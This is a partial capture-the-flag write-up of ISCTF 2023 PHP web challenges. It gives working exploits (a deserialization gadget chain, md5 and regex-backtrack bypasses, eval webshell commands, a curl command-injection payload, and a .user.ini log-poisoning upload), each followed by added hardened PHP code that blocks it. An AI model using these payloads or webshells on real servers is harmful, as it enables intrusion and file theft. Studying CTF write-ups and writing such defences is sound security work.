ISCTF 2023 web writeup (partial)

圣杯战争!!! (Holy Grail War!!!):

<?php
highlight_file(__FILE__);
error_reporting(0);
class artifact{
  public $excalibuer;
  public $arrow;
  public function __toString(){
    echo "为Saber选择了对的武器!<br>";
    return $this->excalibuer->arrow;
  }
}
class prepare{
  public $release;
  public function __get($key){
    $functioin = $this->release;
    echo "蓄力!咖喱棒!!<br>";
    return $functioin();
  }
}
class saber{
  public $weapon;
  public function __invoke(){
    echo "胜利!<br>";
    include($this->weapon);
  }
}
class summon{
  public $Saber;
  public $Rider;
  public function __wakeup(){
    echo "开始召唤从者!<br>";
    echo $this->Saber;
  }
}

Chain: summon -> artifact -> prepare -> saber (summon::__wakeup echoes $Saber, which triggers artifact::__toString; reading $this->excalibuer->arrow on a prepare object triggers __get, which calls $release, a saber, whose __invoke includes $weapon).

<?php
class artifact{
  public $excalibuer;
  public $arrow;
}
class prepare{
  public $release;
}
class saber{
  public $weapon;
}
class summon{
  public $Saber;
  public $Rider;
}
$a = new summon();
$b = new artifact();
$c = new prepare();
$d = new saber();
$a->Saber = $b;
$b->excalibuer = $c;
$c->release = $d;
$d->weapon = "php://filter/convert.base64-encode/resource=flag.php";
echo serialize($a);
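The receiving side of this chain, hardened. This is an added example, not code from the challenge or the writeup; the serialized string is constructed by hand from the chain above, the helper names are mine, and it assumes PHP 7.4 or later (the max_depth option; allowed_classes itself needs 7.0).

```php
<?php
// Added example (not the challenge's or the writeup's code): closing the
// unserialize() sink that the summon->artifact->prepare->saber chain needs.
// Assumes PHP >= 7.4 (max_depth option); allowed_classes needs >= 7.0.

// Constructed sample: the chain the writeup's script generates, as the string
// the target would receive.
$payload = 'O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";'
         . 'O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";'
         . 's:52:"php://filter/convert.base64-encode/resource=flag.php";}}'
         . 's:5:"arrow";N;}s:5:"Rider";N;}';

// Layer 1: cheap pre-check. Serialized scalars and arrays never contain an
// object token, so data that does can be rejected (and logged) before it
// reaches unserialize() at all.
function containsSerializedObject(string $data): bool
{
    // O: = ordinary object, C: = class implementing Serializable
    return preg_match('/(?:^|[;{])[OC]:\d+:"/', $data) === 1;
}

// Layer 2: if objects are genuinely needed, allow-list them. With
// allowed_classes => false every object is materialised as
// __PHP_Incomplete_Class: properties survive as plain data, but the gadget
// classes are never instantiated, so __wakeup, __toString, __get and __invoke
// never run and include() is never reached.
function safeUnserialize(string $data, array $allowedClasses = [])
{
    return unserialize($data, [
        'allowed_classes' => $allowedClasses ?: false,
        'max_depth'       => 8,   // bounds nesting; the chain above is 4 deep
    ]);
}

var_dump(containsSerializedObject($payload));                // bool(true)
var_dump(containsSerializedObject('a:1:{i:0;s:3:"abc";}'));  // bool(false)

$obj = safeUnserialize($payload);
var_dump($obj instanceof __PHP_Incomplete_Class);            // bool(true)
// The class name is kept for forensics, but nothing from the chain executed.
var_dump(((array) $obj)['__PHP_Incomplete_Class_Name']);     // string(6) "summon"
```

The pre-check is the cheap signal for logging and alerting; the allow-list is the control that actually removes the gadget classes from reach. Do not echo or string-convert the incomplete object: that raises an error, which is the point.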

绕进你的心里 (Bypass Into Your Heart):

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
  echo "md5绕过了!";
  if(preg_match("/[0-9]/", $num)){
    die('你干嘛?哎哟!');
  }
  elseif(intval($num)){
    if(preg_match('/.+?ISCTF/is', $str)){
      die("再想想!");
    }
    if(stripos($str, '2023ISCTF') === false){
      die("就差一点点啦!");
    }
    echo $flag;
  }
}
?>

First the md5 check, which is bypassed with arrays (hongmeng[]=1 and shennong[]=2 are two distinct arrays, so !== holds, while md5() of an array yields NULL, so the two md5() results are identical). Then preg_match() on $num is bypassed the same way (zhurong[]=a: preg_match() returns false on an array while intval() of a non-empty array is 1). Finally this part has to be bypassed:

if(preg_match('/.+?ISCTF/is', $str)){
  die("再想想!");
}
if(stripos($str, '2023ISCTF') === false){
  die("就差一点点啦!");
}

import requests

data = {
    'pan[gu': 'a' * 1000000 + '2023ISCTF'
}

res = requests.post('http://gz.imxbt.cn:20215/?hongmeng[]=1&shennong[]=2&zhurong[]=a',
                    data=data, allow_redirects=False)
print(res.text)
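Why the million-character string works, and how the check looks when it no longer does. The 1,000,000 'a's make the lazy `.+?ISCTF` scan exceed PCRE's limits, so preg_match() returns false rather than 0; `if(preg_match(...))` treats false like "no match" and falls through, while stripos() still finds '2023ISCTF'. The following is an added example, not the challenge's code: the same checks rewritten to fail closed on regex errors and to refuse non-string parameters. Parameter names are the challenge's, the helper names are mine, and it assumes PHP 7 or later.

```php
<?php
// Added example (not the challenge's code): the same checks rewritten so that
// the array and backtrack-limit bypasses stop working. Assumes PHP >= 7.
// Parameter names are the challenge's; the helper names are my own.

// preg_match() returns 1 (match), 0 (no match) or false (error). The challenge's
// "if (preg_match(...))" treats false like 0, so when an oversized subject makes
// the engine give up (PREG_BACKTRACK_LIMIT_ERROR, or PREG_JIT_STACKLIMIT_ERROR
// with pcre.jit on) the protective branch is skipped. Fail closed instead.
function strictMatch(string $pattern, string $subject): bool
{
    $r = preg_match($pattern, $subject);
    if ($r === false) {
        throw new RuntimeException('regex aborted, preg_last_error=' . preg_last_error());
    }
    return $r === 1;
}

// $_GET/$_POST values can be arrays ("zhurong[]=a"). md5() of an array is NULL
// on PHP 7 (with a warning) so NULL === NULL passes; preg_match() on an array is
// false; intval() of a non-empty array is 1. Insist on strings, and cap length
// so the regex never sees a backtrack-limit-sized input.
function requireString(array $src, string $key, int $maxLen = 4096): string
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        throw new InvalidArgumentException("$key must be a string");
    }
    if (strlen($src[$key]) > $maxLen) {
        throw new InvalidArgumentException("$key too long");
    }
    return $src[$key];
}

function hardenedCheck(array $get, array $post): string
{
    $lida1 = requireString($get, 'hongmeng');
    $lida2 = requireString($get, 'shennong');
    $num   = requireString($get, 'zhurong');
    $str   = requireString($post, 'pan_gu');

    // hash_equals() is the constant-time comparison; with real strings md5() is never NULL.
    if ($lida1 === $lida2 || !hash_equals(md5($lida1), md5($lida2))) {
        return 'md5 check failed';
    }
    // With a real string that contains no digit, intval() is always 0: the
    // original branch was only ever reachable through the array trick.
    if (strictMatch('/[0-9]/', $num) || !intval($num)) {
        return 'zhurong rejected';
    }
    if (strictMatch('/.+?ISCTF/is', $str)) {
        return 'think again';
    }
    if (stripos($str, '2023ISCTF') === false) {
        return 'almost';
    }
    return 'flag would be printed here';
}

// Constructed inputs reproducing the writeup's request as PHP sees it.
$get  = ['hongmeng' => ['1'], 'shennong' => ['2'], 'zhurong' => ['a']];
$post = ['pan_gu' => str_repeat('a', 1000000) . '2023ISCTF'];
try {
    echo hardenedCheck($get, $post), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";   // rejected: hongmeng must be a string
}

// The regex layer alone, fed the oversized pan_gu directly. Where the engine
// aborts (as it did for the writeup's payload) this reports the error instead
// of silently passing, which is what "if (preg_match(...))" did.
try {
    var_dump(strictMatch('/.+?ISCTF/is', $post['pan_gu']));
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```

The length cap in requireString() is the practical fix for the backtrack problem: no regex should ever be asked to scan an unbounded user string, and a preg_match() error should be logged as an attack signal rather than read as "no match".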

Where is the flag:

<?php
// The flag is split into 3 parts scattered around; they are: xxxxxxxx, xxxx, xxx.
highlight_file(__FILE__);
// standard one-line webshell~
eval($_POST[1]);
?>

Simple and direct: 1=system('env'); prints the current environment variables, and unexpectedly the flag came straight out of there.

wafr:

An RCE challenge:

<?php
/* Read /flaggggggg.txt */
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){ //strings
  die("想读我文件?大胆。");
}
elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){
  die("无字母数字RCE?大胆!");
}
elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){
  die("奇技淫巧?大胆!!");
}
elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){
  die("大胆!!!");
}
else{
  assert($_POST['code']);
}

Simple: code=system('ca\t f*')%0c (the backslash keeps "cat" out of the keyword filter while the shell still reads ca\t as cat, and the f* glob avoids "fl", "ag" and "." ever appearing in the input).

Fuzz!:

<?php
/* Read /flaggggggg.txt
   Hint: you need to learn to fuzz; checking the keyboard key by key has no soul
   Extra knowledge: the curl command can also read files, e.g. curl file:///etc/passwd */
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = 'file:///etc/passwd';
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
  die('你需要fuzz一下哦~');
}
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
  $file = $_GET['file'];
}
system('curl '.$file);

Learned two new things: [a-z] can stand in for any single letter, and "|" is not filtered, so placing it at the start terminates the preceding curl and lets a further system command be appended.

Payload: ?file=|tac /fl[a-z]ggggggg.txt. There is another one as well: ?file=f{i}l{e}:///fla{g}gggggg.txt, which reads the file through file://, i.e. from the local filesystem.
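The defensive counterpart to the two payloads above, as an added example that is not the challenge's code: the character deny-list misses "|", "[", "]", "{" and "}", and both the shell and curl's own URL globbing turn those into command chaining and wildcard expansion. The fix is an allow-list on the parsed URL plus proper quoting before anything reaches the shell. The host list and helper names are mine.

```php
<?php
// Added example (not the challenge's code): replacing system('curl ' . $file)
// and its character deny-list with an allow-list plus proper quoting. Host
// list and names are my own.

const ALLOWED_HOSTS = ['example.com'];   // constructed allow-list

// Deny-lists miss things: the challenge's regex blocks ` ~ ! ... but not | [ ] { },
// so "|cmd" chains a command and "f{i}l{e}" / "[a-z]" are expanded by curl's URL
// globbing or the shell. Decide what is allowed instead of what is forbidden.
function isPermittedUrl(string $url): bool
{
    $p = parse_url($url);
    return $p !== false
        && isset($p['scheme'], $p['host'])
        && in_array(strtolower($p['scheme']), ['http', 'https'], true)
        && in_array(strtolower($p['host']), ALLOWED_HOSTS, true);
}

// Even a permitted URL must not reach the shell as raw text. escapeshellarg()
// wraps it in single quotes, so pipes, semicolons, globs and braces are literal.
function buildCurlCommand(string $url): string
{
    if (!isPermittedUrl($url)) {
        throw new InvalidArgumentException('URL not permitted: ' . $url);
    }
    // --globoff also switches off curl's own {a,b} / [1-9] expansion.
    return 'curl --silent --globoff --max-time 5 ' . escapeshellarg($url);
}

// Constructed inputs: the writeup's two payloads, the hinted file:// read, and a benign URL.
$inputs = [
    '|tac /fl[a-z]ggggggg.txt',
    'f{i}l{e}:///fla{g}gggggg.txt',
    'file:///etc/passwd',
    'https://example.com/robots.txt',
];
foreach ($inputs as $u) {
    try {
        echo buildCurlCommand($u), "\n";
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), "\n";
    }
}
// Only the last input becomes a command:
//   curl --silent --globoff --max-time 5 'https://example.com/robots.txt'
```

Where ext-curl is available, calling curl_init()/curl_exec() from PHP removes the shell from the picture entirely; the allow-list on scheme and host is still needed, since file:// is a valid scheme for that extension too.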

ez_ini:

It turns out to be a file upload. Upload a file named something like .user.ini.png, then rename it to .user.ini in Burp.

Contents:
GIF89a
auto_prepend_file=/var/log/nginx/access.log

Put the small webshell in the User-Agent header (so it lands in the access log that auto_prepend_file now includes), then connect directly with AntSword (蚁剑).
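Upload handling that does not let this trick land, as an added example rather than the challenge's code: the client-supplied name (even after it is rewritten in Burp) is used only to pick an extension from an allow-list, the stored name is random and server-chosen, dotfiles and stacked extensions are refused outright, and images are re-encoded so a "GIF89a" prefix followed by INI text does not survive. Paths and helper names are mine; it assumes PHP 8 (match) and ext-gd.

```php
<?php
// Added example (not the challenge's code): server-side upload handling that
// does not let a client-chosen name like .user.ini (or .user.ini.png renamed
// in Burp) land in a PHP-served directory. Paths and names are my own.
// Assumes PHP >= 8.0 (match) and ext-gd for the re-encode step.

const UPLOAD_DIR  = '/srv/uploads';               // constructed: outside the document root
const ALLOWED_EXT = ['png' => 'image/png', 'gif' => 'image/gif', 'jpg' => 'image/jpeg'];

// Returns the server-chosen stored name, or throws. The client filename is used
// only to pick an extension from the allow-list; it never becomes the stored name.
function storedNameFor(string $clientName): string
{
    $base = basename($clientName);
    // Leading dot (.user.ini, .htaccess) or stacked extensions (a.user.ini.png,
    // shell.php.png) are refused outright rather than pattern-matched.
    if ($base === '' || $base[0] === '.' || substr_count($base, '.') !== 1) {
        throw new InvalidArgumentException('filename rejected: ' . $clientName);
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext])) {
        throw new InvalidArgumentException('extension rejected: ' . $ext);
    }
    // Random name: no attacker-controlled bytes in the path, so no .user.ini
    // can be written even if an extension check were wrong.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Content check. A leading "GIF89a" satisfies libmagic, so finfo alone accepts
// the "GIF89a\nauto_prepend_file=..." polyglot; for images, decode and re-encode
// with GD so only pixel data survives into UPLOAD_DIR.
function reencodeImage(string $tmpPath, string $ext, string $dest): bool
{
    $img = match ($ext) {
        'gif' => @imagecreatefromgif($tmpPath),
        'png' => @imagecreatefrompng($tmpPath),
        'jpg' => @imagecreatefromjpeg($tmpPath),
    };
    if ($img === false) {
        return false;                                // not a decodable image
    }
    $ok = match ($ext) {
        'gif' => imagegif($img, $dest),
        'png' => imagepng($img, $dest),
        'jpg' => imagejpeg($img, $dest),
    };
    imagedestroy($img);
    return $ok;
}

// Constructed client filenames: the writeup's trick plus benign and stacked cases.
foreach (['.user.ini.png', '.user.ini', 'cat.png', 'x.php.png'] as $name) {
    try {
        echo str_pad($name, 14), ' -> ', storedNameFor($name), "\n";
    } catch (InvalidArgumentException $e) {
        echo str_pad($name, 14), ' -> ', $e->getMessage(), "\n";
    }
}
// Only cat.png yields a stored name; the other three are refused.
```

Two server-side settings close the remaining gap independently of the upload code: set user_ini.filename to an empty value in php.ini where per-directory INI files are not needed, and keep the upload directory outside the document root (or served with PHP execution disabled), so that even a stray .user.ini is never read by a PHP request.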